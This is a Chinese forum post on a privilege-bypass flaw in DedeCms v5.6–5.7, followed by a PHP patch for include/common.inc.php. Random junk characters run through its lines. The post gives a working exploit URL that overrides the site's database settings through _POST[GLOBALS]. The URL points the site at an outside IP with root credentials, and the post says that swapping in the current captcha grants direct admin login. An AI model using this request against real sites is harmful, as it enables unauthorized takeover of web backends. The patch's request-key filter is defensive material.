|
- 帖子
- 132
- 积分
- 261
- 阅读权限
- 10
- 注册时间
- 2007-10-28
|
织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ ~1 y; i+ g" s* ~把上面validate=dcug改为当前的验证码,即可直接进入网站后台
4 u$ Z- s! L7 W4 Z7 ~1 F4 t) Q
9 Y$ [+ o T. _7 Q# @( U
8 y0 D, x5 C5 P0 ]! F1 f找到include/common.inc.php文件,把:
foreach($_REQUEST as $_k=>$_v)
( m/ A+ i5 b& s: \; q2 l {; W. x1 [! D7 N7 _5 M9 [% T
var_dump($_k);
7 S" s+ o* Y" x' P3 b# I. J if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
! ~% e* F: G" G {
% Y! |( Y' S( U exit('Request var not allow!');" B. |, a1 B8 {. b! v6 F
}
' e# t/ [" \1 G, J& w! U! C }
8 L! s- J( p6 m) p( A$ h: T% H# Q- R# h
% V/ s9 k3 k% C% w9 E4 y //检查和注册外部提交的变量
# D5 o+ d6 ]+ l3 s' k8 r2 ]6 {$ \1 |8 u8 { function CheckRequest(&$val) {
' r2 Q; e% A; \. T. l) G3 W if (is_array($val)) {
7 {& e2 ^: Y& c foreach ($val as $_k=>$_v) {
: z3 d7 v/ a1 Q" K CheckRequest($_k);
9 @8 S! Q4 p0 O- z/ Q CheckRequest($val[$_k]);
8 |! ]% r, `) C. O. ^! I }6 h) [( f2 h- E' v8 i
} else# R' R" ^0 @8 w7 J9 J4 \ a+ ~
{/ E! h8 N6 M7 p
if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
2 O& v: ~8 |2 a3 j( S, `, s4 M {
7 k! L+ H7 } {* H1 E/ d2 T exit('Request var not allow!');9 N. T% K( t9 f5 J2 Y3 _& {
}
- Q. P) z G! Q! S! s5 P7 o }
7 I! p2 ]& M3 Z9 m1 f }( k% ?( ~" x" |( k1 z
CheckRequest($_REQUEST);# D c( p* ?0 W9 L2 B/ J
0 i: z4 v! k8 X
- U# Q# ]' |+ q: R, X% U \$ g6 y4 d0 E: ?
: R# x! j, g0 s0 X
& v9 \1 L: Q+ x6 a, G% w) N% a" e
7 i& ], o4 L! r' r! ]+ j+ U, g% |8 H7 t. c2 s3 ^* ?
7 u: {+ l1 ~% }1 K
0 o y9 J& W y$ U9 Z$ M7 o) z) C9 o, Z
: {5 B% A! z" K' ]0 p% O
3 T$ a! P4 x9 R# p7 B* w c, k( L% V' R1 P$ [0 o$ p8 y6 J) f
+ J! ^3 a6 s9 G
% |7 Z4 k2 b% t* X6 m3 ]2 X- s0 K" q: k! X. O
& ~1 Q( t3 F) r- A) y6 G
/ S- \8 i% g$ S! @* ?4 k4 j3 k9 k9 n1 U! e" F1 l, L: c
公告:https://www.sitedirsec.com公布最新漏洞,请关注 |
您可能还想看的主题:启明星辰招聘
|
发表于 2019-10-12 23:20
|